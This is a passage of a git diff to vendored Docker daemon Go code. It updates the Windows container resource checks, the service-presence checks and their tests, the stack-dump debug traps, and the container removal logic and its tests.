return nil, nil +// Windows has no concept of an execution state directory. So use config.Root here. +func getPluginExecRoot(root string) string { + return filepath.Join(root, "plugins") } -func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { - return nil -} - -func getBlkioReadIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil -} - -func getBlkioWriteIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil -} - -func getBlkioReadBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil +func (daemon *Daemon) parseSecurityOpt(container *container.Container, hostConfig *containertypes.HostConfig) error { + return parseSecurityOpt(container, hostConfig) } -func getBlkioWriteBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + return nil } -func (daemon *Daemon) getLayerInit() func(string) error { +func setupInitLayer(idMappings *idtools.IDMappings) func(containerfs.ContainerFS) error { return nil } @@ -85,7 +77,7 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf func verifyContainerResources(resources *containertypes.Resources, isHyperv bool) ([]string, error) { warnings := []string{} - + fixMemorySwappiness(resources) if !isHyperv { // The processor resource controls are mutually exclusive on // Windows Server Containers, the order of precedence is @@ -132,6 +124,17 @@ func verifyContainerResources(resources *containertypes.Resources, isHyperv bool return warnings, fmt.Errorf("range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU()) } + osv := system.GetOSVersion() + if resources.NanoCPUs > 0 && isHyperv && osv.Build < 16175 { + leftoverNanoCPUs := resources.NanoCPUs % 1e9 + if leftoverNanoCPUs != 0 && resources.NanoCPUs > 1e9 { + resources.NanoCPUs = ((resources.NanoCPUs + 1e9/2) / 1e9) * 1e9 + warningString := fmt.Sprintf("Your current OS version does not support Hyper-V containers with NanoCPUs greater than 1000000000 but not divisible by 1000000000. NanoCPUs rounded to %d", resources.NanoCPUs) + warnings = append(warnings, warningString) + logrus.Warn(warningString) + } + } + if len(resources.BlkioDeviceReadBps) > 0 { return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadBps") } @@ -171,7 +174,7 @@ func verifyContainerResources(resources *containertypes.Resources, isHyperv bool if resources.MemorySwap != 0 { return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwap") } - if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 { + if resources.MemorySwappiness != nil { return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwappiness") } if resources.OomKillDisable != nil && *resources.OomKillDisable { @@ -192,7 +195,7 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. warnings := []string{} hyperv := daemon.runAsHyperVContainer(hostConfig) - if !hyperv && system.IsWindowsClient() { + if !hyperv && system.IsWindowsClient() && !system.IsIoTCore() { // @engine maintainers. This block should not be removed. It partially enforces licensing // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. return warnings, fmt.Errorf("Windows client operating systems only support Hyper-V containers") @@ -200,19 +203,11 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. w, err := verifyContainerResources(&hostConfig.Resources, hyperv) warnings = append(warnings, w...) - if err != nil { - return warnings, err - } - return warnings, nil -} - -// platformReload update configuration with platform specific options -func (daemon *Daemon) platformReload(config *Config) map[string]string { - return map[string]string{} + return warnings, err } // verifyDaemonSettings performs validation of daemon config struct -func verifyDaemonSettings(config *Config) error { +func verifyDaemonSettings(config *config.Config) error { return nil } @@ -230,22 +225,46 @@ func checkSystem() error { vmcompute := windows.NewLazySystemDLL("vmcompute.dll") if vmcompute.Load() != nil { - return fmt.Errorf("Failed to load vmcompute.dll. Ensure that the Containers role is installed.") + return fmt.Errorf("failed to load vmcompute.dll, ensure that the Containers feature is installed") + } + + // Ensure that the required Host Network Service and vmcompute services + // are running. Docker will fail in unexpected ways if this is not present. + var requiredServices = []string{"hns", "vmcompute"} + if err := ensureServicesInstalled(requiredServices); err != nil { + return errors.Wrap(err, "a required service is not installed, ensure the Containers feature is installed") + } + + return nil +} + +func ensureServicesInstalled(services []string) error { + m, err := mgr.Connect() + if err != nil { + return err + } + defer m.Disconnect() + for _, service := range services { + s, err := m.OpenService(service) + if err != nil { + return errors.Wrapf(err, "failed to open service %s", service) + } + s.Close() } return nil } // configureKernelSecuritySupport configures and validate security support for the kernel -func configureKernelSecuritySupport(config *Config, driverName string) error { +func configureKernelSecuritySupport(config *config.Config, driverName string) error { return nil } // configureMaxThreads sets the Go runtime max threads threshold -func configureMaxThreads(config *Config) error { +func configureMaxThreads(config *config.Config) error { return nil } -func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { +func (daemon *Daemon) initNetworkController(config *config.Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { netOptions, err := daemon.networkOptions(config, nil, nil) if err != nil { return nil, err @@ -304,6 +323,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ // discover and add HNS networks to windows // network that exist are removed and added again for _, v := range hnsresponse { + if strings.ToLower(v.Type) == "private" { + continue // workaround for HNS reporting unsupported networks + } var n libnetwork.Network s := func(current libnetwork.Network) bool { options := current.Info().DriverOptions() @@ -315,6 +337,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ } controller.WalkNetworks(s) + + drvOptions := make(map[string]string) + if n != nil { // global networks should not be deleted by local HNS if n.Info().Scope() == datastore.GlobalScope { @@ -323,14 +348,23 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ v.Name = n.Name() // This will not cause network delete from HNS as the network // is not yet populated in the libnetwork windows driver + + // restore option if it existed before + drvOptions = n.Info().DriverOptions() n.Delete() } - netOption := map[string]string{ winlibnetwork.NetworkName: v.Name, winlibnetwork.HNSID: v.Id, } + // add persisted driver options + for k, v := range drvOptions { + if k != winlibnetwork.NetworkName && k != winlibnetwork.HNSID { + netOption[k] = v + } + } + v4Conf := []*libnetwork.IpamConf{} for _, subnet := range v.Subnets { ipamV4Conf := libnetwork.IpamConf{} @@ -342,8 +376,10 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ name := v.Name // If there is no nat network create one from the first NAT network - // encountered - if !defaultNetworkExists && runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) { + // encountered if it doesn't already exist + if !defaultNetworkExists && + runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) && + n == nil { name = runconfig.DefaultDaemonNetworkMode().NetworkName() defaultNetworkExists = true } @@ -371,7 +407,7 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ return controller, nil } -func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { +func initBridgeDriver(controller libnetwork.NetworkController, config *config.Config) error { if _, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil { return nil } @@ -383,8 +419,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e var ipamOption libnetwork.NetworkOption var subnetPrefix string - if config.bridgeConfig.FixedCIDR != "" { - subnetPrefix = config.bridgeConfig.FixedCIDR + if config.BridgeConfig.FixedCIDR != "" { + subnetPrefix = config.BridgeConfig.FixedCIDR } else { // TP5 doesn't support properly detecting subnet osv := system.GetOSVersion() @@ -429,14 +465,14 @@ func (daemon *Daemon) cleanupMounts() error { return nil } -func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { - return nil, nil, nil +func setupRemappedRoot(config *config.Config) (*idtools.IDMappings, error) { + return &idtools.IDMappings{}, nil } -func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { +func setupDaemonRoot(config *config.Config, rootDir string, rootIDs idtools.IDPair) error { config.Root = rootDir // Create the root directory if it doesn't exists - if err := system.MkdirAllWithACL(config.Root, 0); err != nil && !os.IsExist(err) { + if err := system.MkdirAllWithACL(config.Root, 0, system.SddlAdministratorsLocalSystem); err != nil { return err } return nil @@ -457,7 +493,14 @@ func (daemon *Daemon) runAsHyperVContainer(hostConfig *containertypes.HostConfig // conditionalMountOnStart is a platform specific helper function during the // container start to call mount. func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { - // We do not mount if a Hyper-V container + // Bail out now for Linux containers. We cannot mount the containers filesystem on the + // host as it is a non-Windows filesystem. + if system.LCOWSupported() && container.OS != "windows" { + return nil + } + + // We do not mount if a Hyper-V container as it needs to be mounted inside the + // utility VM, not the host. if !daemon.runAsHyperVContainer(container.HostConfig) { return daemon.Mount(container) } @@ -467,6 +510,11 @@ func (daemon *Daemon) conditionalMountOnStart(container *container.Container) er // conditionalUnmountOnCleanup is a platform specific helper function called // during the cleanup of a container to unmount. func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + // Bail out now for Linux containers + if system.LCOWSupported() && container.OS != "windows" { + return nil + } + // We do not unmount if a Hyper-V container if !daemon.runAsHyperVContainer(container.HostConfig) { return daemon.Unmount(container) @@ -474,66 +522,68 @@ func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container return nil } -func driverOptions(config *Config) []nwconfig.Option { +func driverOptions(config *config.Config) []nwconfig.Option { return []nwconfig.Option{} } func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { if !c.IsRunning() { - return nil, errNotRunning{c.ID} + return nil, errNotRunning(c.ID) } // Obtain the stats from HCS via libcontainerd - stats, err := daemon.containerd.Stats(c.ID) + stats, err := daemon.containerd.Stats(context.Background(), c.ID) if err != nil { + if strings.Contains(err.Error(), "container not found") { + return nil, containerNotFound(c.ID) + } return nil, err } // Start with an empty structure s := &types.StatsJSON{} + s.Stats.Read = stats.Read + s.Stats.NumProcs = platform.NumProcs() - // Populate the CPU/processor statistics - s.CPUStats = types.CPUStats{ - CPUUsage: types.CPUUsage{ - TotalUsage: stats.Processor.TotalRuntime100ns, - UsageInKernelmode: stats.Processor.RuntimeKernel100ns, - UsageInUsermode: stats.Processor.RuntimeKernel100ns, - }, - } - - // Populate the memory statistics - s.MemoryStats = types.MemoryStats{ - Commit: stats.Memory.UsageCommitBytes, - CommitPeak: stats.Memory.UsageCommitPeakBytes, - PrivateWorkingSet: stats.Memory.UsagePrivateWorkingSetBytes, - } - - // Populate the storage statistics - s.StorageStats = types.StorageStats{ - ReadCountNormalized: stats.Storage.ReadCountNormalized, - ReadSizeBytes: stats.Storage.ReadSizeBytes, - WriteCountNormalized: stats.Storage.WriteCountNormalized, - WriteSizeBytes: stats.Storage.WriteSizeBytes, - } - - // Populate the network statistics - s.Networks = make(map[string]types.NetworkStats) - - for _, nstats := range stats.Network { - s.Networks[nstats.EndpointId] = types.NetworkStats{ - RxBytes: nstats.BytesReceived, - RxPackets: nstats.PacketsReceived, - RxDropped: nstats.DroppedPacketsIncoming, - TxBytes: nstats.BytesSent, - TxPackets: nstats.PacketsSent, - TxDropped: nstats.DroppedPacketsOutgoing, + if stats.HCSStats != nil { + hcss := stats.HCSStats + // Populate the CPU/processor statistics + s.CPUStats = types.CPUStats{ + CPUUsage: types.CPUUsage{ + TotalUsage: hcss.Processor.TotalRuntime100ns, + UsageInKernelmode: hcss.Processor.RuntimeKernel100ns, + UsageInUsermode: hcss.Processor.RuntimeKernel100ns, + }, } - } - // Set the timestamp - s.Stats.Read = stats.Timestamp - s.Stats.NumProcs = platform.NumProcs() + // Populate the memory statistics + s.MemoryStats = types.MemoryStats{ + Commit: hcss.Memory.UsageCommitBytes, + CommitPeak: hcss.Memory.UsageCommitPeakBytes, + PrivateWorkingSet: hcss.Memory.UsagePrivateWorkingSetBytes, + } + + // Populate the storage statistics + s.StorageStats = types.StorageStats{ + ReadCountNormalized: hcss.Storage.ReadCountNormalized, + ReadSizeBytes: hcss.Storage.ReadSizeBytes, + WriteCountNormalized: hcss.Storage.WriteCountNormalized, + WriteSizeBytes: hcss.Storage.WriteSizeBytes, + } + // Populate the network statistics + s.Networks = make(map[string]types.NetworkStats) + for _, nstats := range hcss.Network { + s.Networks[nstats.EndpointId] = types.NetworkStats{ + RxBytes: nstats.BytesReceived, + RxPackets: nstats.PacketsReceived, + RxDropped: nstats.DroppedPacketsIncoming, + TxBytes: nstats.BytesSent, + TxPackets: nstats.PacketsSent, + TxDropped: nstats.DroppedPacketsOutgoing, + } + } + } return s, nil } @@ -541,8 +591,9 @@ func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { // daemon to run in. This is only applicable on Windows func (daemon *Daemon) setDefaultIsolation() error { daemon.defaultIsolation = containertypes.Isolation("process") - // On client SKUs, default to Hyper-V - if system.IsWindowsClient() { + // On client SKUs, default to Hyper-V. Note that IoT reports as a client SKU + // but it should not be treated as such. + if system.IsWindowsClient() && !system.IsIoTCore() { daemon.defaultIsolation = containertypes.Isolation("hyperv") } for _, option := range daemon.configStore.ExecOptions { @@ -561,7 +612,7 @@ func (daemon *Daemon) setDefaultIsolation() error { daemon.defaultIsolation = containertypes.Isolation("hyperv") } if containertypes.Isolation(val).IsProcess() { - if system.IsWindowsClient() { + if system.IsWindowsClient() && !system.IsIoTCore() { // @engine maintainers. This block should not be removed. It partially enforces licensing // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. return fmt.Errorf("Windows client operating systems only support Hyper-V containers") @@ -577,28 +628,28 @@ func (daemon *Daemon) setDefaultIsolation() error { return nil } -func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { - var layers []string - for _, l := range rootfs.DiffIDs { - layers = append(layers, l.String()) - } - return types.RootFS{ - Type: rootfs.Type, - Layers: layers, - } +func setupDaemonProcess(config *config.Config) error { + return nil } -func setupDaemonProcess(config *Config) error { +func (daemon *Daemon) setupSeccompProfile() error { return nil } -// verifyVolumesInfo is a no-op on windows. -// This is called during daemon initialization to migrate volumes from pre-1.7. -// volumes were not supported on windows pre-1.7 -func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { +func getRealPath(path string) (string, error) { + if system.IsIoTCore() { + // Due to https://github.com/golang/go/issues/20506, path expansion + // does not work correctly on the default IoT Core configuration. + // TODO @darrenstahlmsft remove this once golang/go/20506 is fixed + return path, nil + } + return fileutils.ReadSymlinkedDirectory(path) +} + +func (daemon *Daemon) loadRuntimes() error { return nil } -func (daemon *Daemon) setupSeccompProfile() error { +func (daemon *Daemon) initRuntimes(_ map[string]types.Runtime) error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows_test.go b/vendor/github.com/docker/docker/daemon/daemon_windows_test.go new file mode 100644 index 0000000000..a4d8b6a20a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_windows_test.go @@ -0,0 +1,72 @@ +// +build windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "strings" + "testing" + + "golang.org/x/sys/windows/svc/mgr" +) + +const existingService = "Power" + +func TestEnsureServicesExist(t *testing.T) { + m, err := mgr.Connect() + if err != nil { + t.Fatal("failed to connect to service manager, this test needs admin") + } + defer m.Disconnect() + s, err := m.OpenService(existingService) + if err != nil { + t.Fatalf("expected to find known inbox service %q, this test needs a known inbox service to run correctly", existingService) + } + defer s.Close() + + input := []string{existingService} + err = ensureServicesInstalled(input) + if err != nil { + t.Fatalf("unexpected error for input %q: %q", input, err) + } +} + +func TestEnsureServicesExistErrors(t *testing.T) { + m, err := mgr.Connect() + if err != nil { + t.Fatal("failed to connect to service manager, this test needs admin") + } + defer m.Disconnect() + s, err := m.OpenService(existingService) + if err != nil { + t.Fatalf("expected to find known inbox service %q, this test needs a known inbox service to run correctly", existingService) + } + defer s.Close() + + for _, testcase := range []struct { + input []string + expectedError string + }{ + { + input: []string{"daemon_windows_test_fakeservice"}, + expectedError: "failed to open service daemon_windows_test_fakeservice", + }, + { + input: []string{"daemon_windows_test_fakeservice1", "daemon_windows_test_fakeservice2"}, + expectedError: "failed to open service daemon_windows_test_fakeservice1", + }, + { + input: []string{existingService, "daemon_windows_test_fakeservice"}, + expectedError: "failed to open service daemon_windows_test_fakeservice", + }, + } { + t.Run(strings.Join(testcase.input, ";"), func(t *testing.T) { + err := ensureServicesInstalled(testcase.input) + if err == nil { + t.Fatalf("expected error for input %v", testcase.input) + } + if !strings.Contains(err.Error(), testcase.expectedError) { + t.Fatalf("expected error %q to contain %q", err.Error(), testcase.expectedError) + } + }) + } +} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap.go b/vendor/github.com/docker/docker/daemon/debugtrap.go deleted file mode 100644 index 209048b589..0000000000 --- a/vendor/github.com/docker/docker/daemon/debugtrap.go +++ /dev/null @@ -1,62 +0,0 @@ -package daemon - -import ( - "fmt" - "os" - "path/filepath" - "strings" - "time" - - "github.com/davecgh/go-spew/spew" - "github.com/pkg/errors" -) - -const dataStructuresLogNameTemplate = "daemon-data-%s.log" - -// dumpDaemon appends the daemon datastructures into file in dir and returns full path -// to that file. -func (d *Daemon) dumpDaemon(dir string) (string, error) { - // Ensure we recover from a panic as we are doing this without any locking - defer func() { - recover() - }() - - path := filepath.Join(dir, fmt.Sprintf(dataStructuresLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1))) - f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666) - if err != nil { - return "", errors.Wrap(err, "failed to open file to write the daemon datastructure dump") - } - defer f.Close() - - dump := struct { - containers interface{} - names interface{} - links interface{} - execs interface{} - volumes interface{} - images interface{} - layers interface{} - imageReferences interface{} - downloads interface{} - uploads interface{} - registry interface{} - plugins interface{} - }{ - containers: d.containers, - execs: d.execCommands, - volumes: d.volumes, - images: d.imageStore, - layers: d.layerStore, - imageReferences: d.referenceStore, - downloads: d.downloadManager, - uploads: d.uploadManager, - registry: d.RegistryService, - plugins: d.PluginStore, - names: d.nameIndex, - links: d.linkIndex, - } - - spew.Fdump(f, dump) // Does not return an error - f.Sync() - return path, nil -} diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go index d650eb7f8c..c8abe69bb6 100644 --- a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go @@ -1,19 +1,19 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "os" "os/signal" - "syscall" - "github.com/Sirupsen/logrus" stackdump "github.com/docker/docker/pkg/signal" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func (d *Daemon) setupDumpStackTrap(root string) { c := make(chan os.Signal, 1) - signal.Notify(c, syscall.SIGUSR1) + signal.Notify(c, unix.SIGUSR1) go func() { for range c { path, err := stackdump.DumpStacks(root) @@ -22,12 +22,6 @@ func (d *Daemon) setupDumpStackTrap(root string) { } else { logrus.Infof("goroutine stacks written to %s", path) } - path, err = d.dumpDaemon(root) - if err != nil { - logrus.WithError(err).Error("failed to write daemon datastructure dump") - } else { - logrus.Infof("daemon datastructure dump written to %s", path) - } } }() } diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go index f5b9170907..e83d51f597 100644 --- a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!darwin,!freebsd,!windows,!solaris +// +build !linux,!darwin,!freebsd,!windows -package daemon +package daemon // import "github.com/docker/docker/daemon" func (d *Daemon) setupDumpStackTrap(_ string) { return diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go index fb20c9d2c5..b438d03812 100644 --- a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go +++ b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go @@ -1,52 +1,46 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "os" - "syscall" "unsafe" winio "github.com/Microsoft/go-winio" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/signal" - "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" ) func (d *Daemon) setupDumpStackTrap(root string) { // Windows does not support signals like *nix systems. So instead of // trapping on SIGUSR1 to dump stacks, we wait on a Win32 event to be // signaled. ACL'd to builtin administrators and local system - ev := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid()) + event := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid()) + ev, _ := windows.UTF16PtrFromString(event) sd, err := winio.SddlToSecurityDescriptor("D:P(A;;GA;;;BA)(A;;GA;;;SY)") if err != nil { - logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", ev, err.Error()) + logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", event, err.Error()) return } - var sa syscall.SecurityAttributes + var sa windows.SecurityAttributes sa.Length = uint32(unsafe.Sizeof(sa)) sa.InheritHandle = 1 sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0])) - h, err := system.CreateEvent(&sa, false, false, ev) + h, err := windows.CreateEvent(&sa, 0, 0, ev) if h == 0 || err != nil { - logrus.Errorf("failed to create debug stackdump event %s: %s", ev, err.Error()) + logrus.Errorf("failed to create debug stackdump event %s: %s", event, err.Error()) return } go func() { - logrus.Debugf("Stackdump - waiting signal at %s", ev) + logrus.Debugf("Stackdump - waiting signal at %s", event) for { - syscall.WaitForSingleObject(h, syscall.INFINITE) + windows.WaitForSingleObject(h, windows.INFINITE) path, err := signal.DumpStacks(root) if err != nil { logrus.WithError(err).Error("failed to write goroutines dump") } else { logrus.Infof("goroutine stacks written to %s", path) } - path, err = d.dumpDaemon(root) - if err != nil { - logrus.WithError(err).Error("failed to write daemon datastructure dump") - } else { - logrus.Infof("daemon datastructure dump written to %s", path) - } } }() } diff --git a/vendor/github.com/docker/docker/daemon/delete.go b/vendor/github.com/docker/docker/daemon/delete.go index 6b622bde37..2ccbff05fb 100644 --- a/vendor/github.com/docker/docker/daemon/delete.go +++ b/vendor/github.com/docker/docker/daemon/delete.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -7,12 +7,12 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" "github.com/docker/docker/container" - "github.com/docker/docker/layer" - volumestore "github.com/docker/docker/volume/store" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerRm removes the container id from the filesystem. An error @@ -29,7 +29,7 @@ func (daemon *Daemon) ContainerRm(name string, config *types.ContainerRmConfig) // Container state RemovalInProgress should be used to avoid races. if inProgress := container.SetRemovalInProgress(); inProgress { err := fmt.Errorf("removal of container %s is already in progress", name) - return errors.NewBadRequestError(err) + return errdefs.Conflict(err) } defer container.ResetRemovalInProgress() @@ -58,7 +58,7 @@ func (daemon *Daemon) rmLink(container *container.Container, name string) error } parent = strings.TrimSuffix(parent, "/") - pe, err := daemon.nameIndex.Get(parent) + pe, err := daemon.containersReplica.Snapshot().GetID(parent) if err != nil { return fmt.Errorf("Cannot get parent %s for name %s", parent, name) } @@ -79,90 +79,74 @@ func (daemon *Daemon) rmLink(container *container.Container, name string) error func (daemon *Daemon) cleanupContainer(container *container.Container, forceRemove, removeVolume bool) (err error) { if container.IsRunning() { if !forceRemove { - err := fmt.Errorf("You cannot remove a running container %s. Stop the container before attempting removal or use -f", container.ID) - return errors.NewRequestConflictError(err) + state := container.StateString() + procedure := "Stop the container before attempting removal or force remove" + if state == "paused" { + procedure = "Unpause and then " + strings.ToLower(procedure) + } + err := fmt.Errorf("You cannot remove a %s container %s. %s", state, container.ID, procedure) + return errdefs.Conflict(err) } if err := daemon.Kill(container); err != nil { return fmt.Errorf("Could not kill running container %s, cannot remove - %v", container.ID, err) } } + if !system.IsOSSupported(container.OS) { + return fmt.Errorf("cannot remove %s: %s ", container.ID, system.ErrNotSupportedOperatingSystem) + } // stop collection of stats for the container regardless // if stats are currently getting collected. - daemon.statsCollector.stopCollection(container) + daemon.statsCollector.StopCollection(container) if err = daemon.containerStop(container, 3); err != nil { return err } // Mark container dead. We don't want anybody to be restarting it. - container.SetDead() + container.Lock() + container.Dead = true // Save container state to disk. So that if error happens before // container meta file got removed from disk, then a restart of // docker should not make a dead container alive. - if err := container.ToDiskLocking(); err != nil && !os.IsNotExist(err) { + if err := container.CheckpointTo(daemon.containersReplica); err != nil && !os.IsNotExist(err) { logrus.Errorf("Error saving dying container to disk: %v", err) } - - // If force removal is required, delete container from various - // indexes even if removal failed. - defer func() { - if err == nil || forceRemove { - daemon.nameIndex.Delete(container.ID) - daemon.linkIndex.delete(container) - selinuxFreeLxcContexts(container.ProcessLabel) - daemon.idIndex.Delete(container.ID) - daemon.containers.Delete(container.ID) - if e := daemon.removeMountPoints(container, removeVolume); e != nil { - logrus.Error(e) - } - daemon.LogContainerEvent(container, "destroy") - } - }() - - if err = os.RemoveAll(container.Root); err != nil { - return fmt.Errorf("Unable to remove filesystem for %v: %v", container.ID, err) - } + container.Unlock() // When container creation fails and `RWLayer` has not been created yet, we // do not call `ReleaseRWLayer` if container.RWLayer != nil { - metadata, err := daemon.layerStore.ReleaseRWLayer(container.RWLayer) - layer.LogReleaseMetadata(metadata) - if err != nil && err != layer.ErrMountDoesNotExist { - return fmt.Errorf("Driver %s failed to remove root filesystem %s: %s", daemon.GraphDriverName(), container.ID, err) + err := daemon.imageService.ReleaseLayer(container.RWLayer, container.OS) + if err != nil { + err = errors.Wrapf(err, "container %s", container.ID) + container.SetRemovalError(err) + return err } + container.RWLayer = nil } - return nil -} - -// VolumeRm removes the volume with the given name. -// If the volume is referenced by a container it is not removed -// This is called directly from the Engine API -func (daemon *Daemon) VolumeRm(name string, force bool) error { - err := daemon.volumeRm(name) - if err == nil || force { - daemon.volumes.Purge(name) - return nil + if err := system.EnsureRemoveAll(container.Root); err != nil { + e := errors.Wrapf(err, "unable to remove filesystem for %s", container.ID) + container.SetRemovalError(e) + return e } - return err -} -func (daemon *Daemon) volumeRm(name string) error { - v, err := daemon.volumes.Get(name) - if err != nil { - return err + linkNames := daemon.linkIndex.delete(container) + selinuxFreeLxcContexts(container.ProcessLabel) + daemon.idIndex.Delete(container.ID) + daemon.containers.Delete(container.ID) + daemon.containersReplica.Delete(container) + if e := daemon.removeMountPoints(container, removeVolume); e != nil { + logrus.Error(e) } - - if err := daemon.volumes.Remove(v); err != nil { - if volumestore.IsInUse(err) { - err := fmt.Errorf("Unable to remove volume, volume still in use: %v", err) - return errors.NewRequestConflictError(err) - } - return fmt.Errorf("Error while removing volume %s: %v", name, err) + for _, name := range linkNames { + daemon.releaseName(name) } - daemon.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()}) + container.SetRemoved() + stateCtr.del(container.ID) + + daemon.LogContainerEvent(container, "destroy") return nil } diff --git a/vendor/github.com/docker/docker/daemon/delete_test.go b/vendor/github.com/docker/docker/daemon/delete_test.go index 1fd27e1ffa..d600917b0c 100644 --- a/vendor/github.com/docker/docker/daemon/delete_test.go +++ b/vendor/github.com/docker/docker/daemon/delete_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -9,35 +9,87 @@ import ( "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -func TestContainerDoubleDelete(t *testing.T) { +func newDaemonWithTmpRoot(t *testing.T) (*Daemon, func()) { tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmp) - daemon := &Daemon{ + assert.NilError(t, err) + d := &Daemon{ repository: tmp, root: tmp, } - daemon.containers = container.NewMemoryStore() - - container := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "test", - State: container.NewState(), - Config: &containertypes.Config{}, - }, + d.containers = container.NewMemoryStore() + return d, func() { os.RemoveAll(tmp) } +} + +func newContainerWithState(state *container.State) *container.Container { + return &container.Container{ + ID: "test", + State: state, + Config: &containertypes.Config{}, + } +} + +// TestContainerDelete tests that a useful error message and instructions is +// given when attempting to remove a container (#30842) +func TestContainerDelete(t *testing.T) { + tt := []struct { + errMsg string + fixMsg string + initContainer func() *container.Container + }{ + // a paused container + { + errMsg: "cannot remove a paused container", + fixMsg: "Unpause and then stop the container before attempting removal or force remove", + initContainer: func() *container.Container { + return newContainerWithState(&container.State{Paused: true, Running: true}) + }}, + // a restarting container + { + errMsg: "cannot remove a restarting container", + fixMsg: "Stop the container before attempting removal or force remove", + initContainer: func() *container.Container { + c := newContainerWithState(container.NewState()) + c.SetRunning(0, true) + c.SetRestarting(&container.ExitStatus{}) + return c + }}, + // a running container + { + errMsg: "cannot remove a running container", + fixMsg: "Stop the container before attempting removal or force remove", + initContainer: func() *container.Container { + return newContainerWithState(&container.State{Running: true}) + }}, } - daemon.containers.Add(container.ID, container) + + for _, te := range tt { + c := te.initContainer() + d, cleanup := newDaemonWithTmpRoot(t) + defer cleanup() + d.containers.Add(c.ID, c) + + err := d.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: false}) + assert.Check(t, is.ErrorContains(err, te.errMsg)) + assert.Check(t, is.ErrorContains(err, te.fixMsg)) + } +} + +func TestContainerDoubleDelete(t *testing.T) { + c := newContainerWithState(container.NewState()) // Mark the container as having a delete in progress - container.SetRemovalInProgress() + c.SetRemovalInProgress() + + d, cleanup := newDaemonWithTmpRoot(t) 